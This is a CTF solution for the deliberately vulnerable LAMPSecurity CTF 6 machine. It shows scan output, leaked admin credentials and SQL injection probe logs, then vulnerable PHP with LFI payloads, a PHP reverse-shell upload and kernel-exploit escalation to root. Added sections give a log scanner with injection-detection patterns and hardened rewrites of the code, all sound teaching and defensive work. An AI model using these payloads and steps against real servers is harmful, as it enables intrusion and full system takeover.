Solution to the LAMPSecurity: CTF 6 Challenge by @killr00t, winner of the challenge


LAMPSecurity CTF6 SOLUTION by killr00t groupidp@gmail.com


Network Mapping

Target IP: 192.168.1.72

Port Scanning and Banners


Tool: WhatWeb
Result:
http://192.168.1.72 [200] Meta-Author[Justin C. Klein Keane], HTTPServer[CentOS][Apache/2.2.3 (CentOS)], Apache[2.2.3] IP[192.168.1.72] PHP[5.2.6] X-Powered-By[PHP/5.2.6] Cookies[PHPSESSID] Title[CTF 6 - Widgets Inc.] fred@192.168.1.72 john@192.168.1.72 jukeane@sas.upenn.edu linda@192.168.1.72 molly@192.168.1.72 sales@192.168.1.72 toby@192.168.1.72 Country[RESERVED][ZZ]

Tool: nikto
Result:
+ Server: Apache/2.2.3 (CentOS)
+ Number of sections in the version string differ from those in the database, the server reports: apache/2.2.3 while the database has: 2.2.14. This may cause false positives.
+ Retrieved X-Powered-By header: PHP/5.2.6
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/enus/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing is enabled: /sql/
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons
+ OSVDB-3268: /manual/images/: Directory indexing is enabled: /manual/images
+ OSVDB-3268: /docs/: Directory indexing is enabled: /docs
+ OSVDB-3233: /icons/README: Apache default file found.
+ 3818 items checked: 16 item(s) reported on remote host


Directories

Tool: Dirbuster
Result:
/cgi-bin
/files
/templates
/icons
/docs
/icons
/mail
/js
/templates

Tool: nikto
Result:
/files
/lib
/mail
/phpmyadmin
/sql
/manual
/docs
/icons


Files of Interest

/sql/db.sql
INSERT INTO user SET user_id = 1, user_username='admin', user_password=md5('adminpass');

User  => admin
Pass  => 25e4ee4e9229397b6b17776bfceaf8e7 => adminpass
DB    => cms
Table => user

/docs/code_backup.tgz

/conf/config.ini

/logs/log.log

2009-06-28 13:06:09 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from%20dual
2009-06-28 13:06:09 Problem with event select: . The used SELECT statements have a different number of columns
2009-06-28 13:06:28 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:29 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:43 172.16.61.132 called id=4%20UNION%20select%20version,1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:43 Problem with event select: . Unknown column 'version' in 'field list'
2009-06-28 13:06:52 172.16.61.132 called id=4%20UNION%20select%20version(),1,1,1,1,1,1%20from%20dual
2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:52 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select version(),1,1,1,1,1,1 from dual' at line 1
2009-06-28 13:06:13 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,7%20from%20dual
2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
2009-06-28 13:06:13 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,7 from dual' at line 1
2009-06-28 13:06:30 172.16.61.132 called id=4%20UNION%20select%201,2,3,4,5,6,version()%20from%20dual
2009-06-28 13:06:30 Problem with log hit update. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION select 1,2,3,4,5,6,version() from dual' at line 1

Note: some vulnerabilities had already been identified in this backup; it is worth looking at the requests that were made in order to escalate faster.
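The log above is also what a defender would look at. As an added example (not part of the original write-up), the function below reads lines in the format this CMS writes to /logs/log.log, decodes the query string and flags requests carrying SQL keywords; the sample lines are constructed from entries shown on the page plus one benign request.

```php
<?php
// Added example, not the CTF's code: scan lines in the CMS's own
// /logs/log.log format ("<date> <time> <ip> called <query>") for the
// UNION-based probes recorded in the backup. Sample input is constructed.

$sampleLog = <<<'LOG'
2009-06-28 13:06:09 172.16.61.132 called id=4%20UNION%20select%201,1,1,1,1,1%20from%20dual
2009-06-28 13:06:09 Problem with event select: . The used SELECT statements have a different number of columns
2009-06-28 13:06:52 172.16.61.132 called id=4%20UNION%20select%20version(),1,1,1,1,1,1%20from%20dual
2009-06-28 13:07:10 172.16.61.140 called id=4
LOG;

// Returns one record per suspicious request: time, source IP, decoded
// query string and the names of the indicators that matched.
function findInjectionProbes(string $log): array
{
    $indicators = [
        'union-select' => '/\bunion\b.*\bselect\b/is',
        'sql-comment'  => '~(--|/\*|#)~',
        'quote'        => "/'/",
    ];
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Only "called <query>" lines carry client input; error lines are skipped.
        if (!preg_match('/^(\S+ \S+) (\d{1,3}(?:\.\d{1,3}){3}) called (.+)$/', $line, $m)) {
            continue;
        }
        [, $time, $ip, $raw] = $m;
        // Decode once so %20-separated keywords are matched on their real text.
        $query = urldecode($raw);
        $matched = [];
        foreach ($indicators as $name => $re) {
            if (preg_match($re, $query)) {
                $matched[] = $name;
            }
        }
        if ($matched) {
            $hits[] = ['time' => $time, 'ip' => $ip, 'query' => $query, 'matched' => $matched];
        }
    }
    return $hits;
}

foreach (findInjectionProbes($sampleLog) as $h) {
    printf("%s %s [%s] %s\n", $h['time'], $h['ip'], implode(',', $h['matched']), $h['query']);
}
```

On the sample input the two UNION requests from 172.16.61.132 are reported and the plain id=4 request is not.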


Vulnerability Identification (code_backup.tgz)

File: /actions/login.php
Code:

if (isset($_POST['username']) && isset($_POST['password'])) {
    // username is concatenated into the query: SQL Injection
    $sql = "select user_id from user where user_username = '" . $_POST['username'] . "'";
    $query = mysql_query($sql) or die("Query error with $sql: " . mysql_error());
    if ($query && mysql_num_rows($query) > 0) {
        //user exists
        $uname = mysql_fetch_object($query);
        // password is concatenated into the query: SQL Injection
        $sql = "select * from user where user_id = " . $uname->user_id . " AND user_password = md5('" . $_POST['password'] . "')";
        $query = mysql_query($sql) or $log->append("Query error in login $sql<hr/> " . mysql_error());
        $retval = array();
        if (! $query) {
            //no return value
        } else {
            $retval = mysql_fetch_object($query);
        }
    }
    if (isset($retval->user_id)) {
        setcookie("logged_in", 1, time()+3600);
        setcookie("user_id", $retval->user_id, time()+3600);
        setcookie("hash", $retval->user_password, time()+3600);
        $logged_in = 1;
    }
}
if ($logged_in)
    include_once('templates/logged_in.tpl');
else
    // action is used directly in the include path: Local File Include
    include_once('templates/'.$_GET['action'].'.tpl');

Vulnerabilities: SQL Injection
Vulnerable variables: username, password
Vulnerability description: The variables are not filtered, which allows interacting with the database and extracting information. The submitted parameters are checked directly: first the username variable and, if that user exists, then the second variable, password; both are vulnerable.

Vulnerabilities: Local File Include
Vulnerable variables: action
Vulnerability description: Allows including files outside the web directory via GET
Exploit: /actions/login.php?action=../../../../../etc/passwd%00
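For comparison, here is the same login flow with both defects removed. This is an added example and not code from the CTF: it assumes a mysqli connection in $db, that user.user_password has been rehashed with password_hash() (db.sql on the page stores md5() hashes), and that the only templates reachable via action are login and add_event (names inferred from the page's file list).

```php
<?php
// Added example, not the CTF's code: /actions/login.php with bound
// parameters and an allowlisted template name. Assumes a mysqli
// connection in $db and password_hash() values in user.user_password.

session_start();

// Returns the user_id on success, null on unknown user or wrong password.
function authenticate(mysqli $db, string $username, string $password): ?int
{
    // The username travels as a bound parameter, never as SQL text, so
    // quotes or UNION in the field are compared literally.
    $stmt = $db->prepare('SELECT user_id, user_password FROM user WHERE user_username = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($userId, $hash);
    $found = $stmt->fetch();
    $stmt->close();

    // The password is verified in PHP against the stored hash; it is
    // never placed in a query at all.
    if ($found && password_verify($password, $hash)) {
        return (int) $userId;
    }
    return null;
}

// Maps action to a fixed set of templates, replacing
// include_once('templates/'.$_GET['action'].'.tpl'): the request value is
// only used as an array key, so ../ and %00 never reach the filesystem.
function resolveTemplate(?string $action): string
{
    $allowed = ['login' => 'templates/login.tpl', 'add_event' => 'templates/add_event.tpl'];
    return $allowed[$action] ?? $allowed['login'];
}

if (isset($_POST['username'], $_POST['password'])) {
    $userId = authenticate($db, (string) $_POST['username'], (string) $_POST['password']);
    if ($userId !== null) {
        // Server-side session state replaces the logged_in/user_id/hash cookies.
        session_regenerate_id(true);
        $_SESSION['user_id'] = $userId;
    }
}

if (isset($_SESSION['user_id'])) {
    include_once 'templates/logged_in.tpl';
} else {
    include_once resolveTemplate($_GET['action'] ?? null);
}
```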


File: /actions/add_event.php
Code:

if (! $logged_in) header("Location:index.php");
$log->append("Adding file!") or die("Couldn't append to log for some reason!");
if (isset($_POST['title'])) {
    if (isset($_FILES['upload'])) {
        $uploaddir = 'files/';
        // the client's file name is used as-is, with no extension check: file upload
        $uploadfile = $uploaddir . basename($_FILES['upload']['name']);
        if (! move_uploaded_file($_FILES['upload']['tmp_name'], $uploadfile)) {
            $log->append("Log upload problem with file array: $_FILES");
            $log->append("Upload file name: $uploadfile");
            $log->append("Upload file tmp name: " . $_FILES['upload']['tmp_name']);
        }
    }
    $sql = "insert into event set event_title='" . $_POST['title'] . "', event_body='" . addslashes($_POST['body']) . "', event_file='" . $uploadfile . "', user_id = " . $_COOKIE['user_id'];
    mysql_query($sql) or $log->append("Problem with insert. " . mysql_error());
}
// action is used directly in the include path: Local File Include
include_once('templates/'.$_GET['action'].'.tpl');

Vulnerabilities: Local File Include
Vulnerable variables: action
Vulnerability description: Allows including files outside the web directory via GET
Exploit: /actions/add_event.php?action=../../../../../etc/passwd%00

Vulnerabilities: File upload
Vulnerability description: Allows uploading files that make it possible to execute operating-system commands; this happens because the code does not validate any file extension.

Note: All the files have programming problems; I will only use this last file to upload the shell directly and escalate privileges.
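The upload step is where the shell gets onto the box, so here is what a hardened version of that step looks like. This is an added example, not the CTF's code; it assumes the same files/ directory, a mysqli connection in $db, and that login stored the user's id in $_SESSION['user_id'].

```php
<?php
// Added example, not the CTF's code: the upload and insert steps of
// /actions/add_event.php with the checks the original lacks. Assumes
// files/, a mysqli connection in $db and $_SESSION['user_id'] from login.

// Returns the server-chosen file name, or null if the upload is rejected.
function storeUpload(array $file, string $uploadDir): ?string
{
    // Accept only a file PHP itself received through this request.
    if (($file['error'] ?? null) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Type comes from the bytes on disk, not from the client-supplied name.
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'application/pdf' => 'pdf'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        return null;
    }
    // The name on disk is random with an extension from the allowlist, so
    // basename($_FILES['upload']['name']) (e.g. sh.php) is never used.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $name;
}

if (!isset($_SESSION['user_id'])) {
    header('Location: index.php');
    exit; // stop here so nothing below runs for an unauthenticated request
}

if (isset($_POST['title'])) {
    $stored = '';
    if (isset($_FILES['upload'])) {
        $stored = storeUpload($_FILES['upload'], 'files/');
        if ($stored === null) {
            die('Upload rejected');
        }
    }
    // Bound parameters for every field; user_id is taken from the session
    // instead of the user_id cookie.
    $stmt = $db->prepare('INSERT INTO event SET event_title = ?, event_body = ?, event_file = ?, user_id = ?');
    $body = (string) ($_POST['body'] ?? '');
    $stmt->bind_param('sssi', $_POST['title'], $body, $stored, $_SESSION['user_id']);
    $stmt->execute();
}
```

Serve files/ with script execution disabled as well (for mod_php, `php_admin_flag engine off` inside a Directory block), so a misclassified upload still cannot run as PHP.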


Exploitation and Privilege Escalation

File: /actions/add_event.php
Exploit: file upload
Description: a PHP shell is chosen and the event is added after logging into the CMS

CMS LOGIN

User: admin Pass: adminpass

Note: These credentials were already collected from the SQL file that was found.

ADD EVENTS: In this section there is a menu for which we already saw the vulnerable code that lets us upload the shell directly.



SHELL UPLOAD

Fill in the form, choose my shell (sh.php) and click Add event.

The reverse-connection backdoor is uploaded to make running commands more convenient.

It gives us a series of local exploits we can use. I will use http://www.exploit-db.com/exploits/8478/, which is the only one that worked for me; there are several for that kernel version, but as I say only this one worked for me.

We add ourselves to the system as a privileged user and log in via SSH.

We set a password for the user and connect via SSH.

Root Owned! Cheers

